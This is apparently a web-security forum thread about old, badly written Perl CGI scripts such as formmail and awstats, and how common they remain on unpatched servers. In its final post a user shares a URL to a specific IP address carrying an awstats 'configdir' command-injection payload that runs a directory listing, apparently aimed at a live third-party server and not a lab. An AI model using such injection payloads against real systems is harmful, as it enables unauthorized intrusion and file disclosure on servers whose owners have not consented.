formmail.pl

[SirDice]

Originally posted here by sploiterwannabe
yep i have read, and discussion here is about web security
most perl scripts can make anybody gain access to servers
like count.cgi for example or awstats.pl, calendar.pl
with this scripts somebody could view files and folders on certain servers

Most perl scripts? I don't think so. Only the badly written ones.

[ss2chef]

Originally posted here by Black Cluster
Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins

We have found that any webserver that has been running for more than a few years has a good chance of running a bad perl script like formmail. There was a time when a large percentage of "home pages" got their guestbooks, hitcounters, and form processors from Matt's Script Archive since they were the "cgi" download spot of choice in the mid 1990s.
Just last fall we upgraded ~ 100 webservers a company had from another company they took over...All running bad versions of formmail. Was spammer heaven to be sure.

[sploiterwannabe]

unppatched awstats script

http://194.168.163.54/cgi-bin/awstat....pl?configdir=|echo;ls%20-alF;exit|